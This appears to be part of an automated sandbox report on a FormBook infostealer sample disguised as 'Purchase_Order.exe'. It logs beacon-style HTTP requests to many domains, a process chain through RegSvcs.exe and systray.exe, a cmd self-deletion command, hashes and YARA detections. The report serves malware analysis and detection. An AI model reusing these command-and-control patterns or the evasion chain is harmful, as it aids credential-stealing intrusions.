3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49736 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:02:39.242866039 CEST | kBytes transferred: 1563 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.tylerrucarean.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:02:39.380528927 CEST | kBytes transferred: 1804 | Direction: IN | Data:
                                                                          HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Fri, 11 Jun 2021 13:02:39 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60c03ab8-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49737 | Destination IP: 156.241.53.127 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:02:44.697962046 CEST | kBytes transferred: 4589 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.cgjanvier.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:02:45.473994017 CEST | kBytes transferred: 4590 | Direction: IN | Data:
                                                                          HTTP/1.1 302 Moved Temporarily
                                                                          Date: Fri, 11 Jun 2021 13:02:44 GMT
                                                                          Server: Apache
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Set-Cookie: PHPSESSID=j3m6f66rdeckaaj3j3b3fkf2p4; path=/
                                                                          Upgrade: h2
                                                                          Connection: Upgrade, close
                                                                          Location: /
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=gbk


                                                                          Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49738 | Destination IP: 184.168.131.241 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:02:50.500833035 CEST | kBytes transferred: 4592 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.flockuplabs.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:02:50.718878031 CEST | kBytes transferred: 4592 | Direction: IN | Data:
                                                                          HTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.16.1
                                                                          Date: Fri, 11 Jun 2021 13:02:50 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Location: https://flockuplabs.netlify.app/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49739 | Destination IP: 104.21.64.212 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:02:55.901098967 CEST | kBytes transferred: 4593 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.culturalinterface.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:02:56.303220987 CEST | kBytes transferred: 4594 | Direction: IN | Data:
                                                                          HTTP/1.1 403 forbidden
                                                                          Date: Fri, 11 Jun 2021 13:02:56 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0a9cc42fc10000c29525aa6000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jmGl9O6L%2B3wEM9OVAKoZuFUbBtUYOG6CrWGKf4JmH1L1C%2BfxSAkIpCbiI%2B1KFNya5NS4Pmg9NGI90JR8a5LE4JQyRErHT%2FqpGyTpWqq%2Bx%2Fd7RrOPqsAgJOeRVftjdSZTahvfYPwJBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 65db095f9fc7c295-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                          Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a
                                                                          Data Ascii: d403 FORBIDDEN


                                                                          Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49746 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:03:01.424962997 CEST | kBytes transferred: 4874 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.toolbnbapp.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:03:01.563910007 CEST | kBytes transferred: 4915 | Direction: IN | Data:
                                                                          HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Fri, 11 Jun 2021 13:03:01 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60ba413e-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49752 | Destination IP: 45.140.167.161 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:03:06.762137890 CEST | kBytes transferred: 5490 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.trainup-wall.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:03:06.846755028 CEST | kBytes transferred: 5490 | Direction: IN | Data:
                                                                          HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Fri, 11 Jun 2021 13:03:06 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                                                                          Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49753 | Destination IP: 160.16.235.37 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:03:12.500335932 CEST | kBytes transferred: 5495 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.paolograssino.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:03:13.179290056 CEST | kBytes transferred: 5497 | Direction: IN | Data:
                                                                          HTTP/1.1 403 Forbidden
                                                                          Server: nginx/1.20.0
                                                                          Date: Fri, 11 Jun 2021 13:03:13 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 13
                                                                          Connection: close
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Content-Type-Options: nosniff
                                                                          Data Raw: 34 30 33 20 46 6f 72 62 69 64 64 65 6e
                                                                          Data Ascii: 403 Forbidden


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          System Behavior

                                                                          General

                                                                          Start time:15:01:12
                                                                          Start date:11/06/2021
                                                                          Path:C:\Users\user\Desktop\Purchase_Order.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Purchase_Order.exe'
                                                                          Imagebase:0x4f0000
                                                                          File size:1532416 bytes
                                                                          MD5 hash:4AA8159742BECD97F9ECDDA33798B065
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:15:01:23
                                                                          Start date:11/06/2021
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Imagebase:0x860000
                                                                          File size:45152 bytes
                                                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 15:01:26
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:01:49
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\systray.exe
Imagebase: 0x13b0000
File size: 9728 bytes
MD5 hash: 1373D481BE4C8A6E5F5030D2FB0A0C68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 15:01:54
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase: 0x230000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:01:54
Start date: 11/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis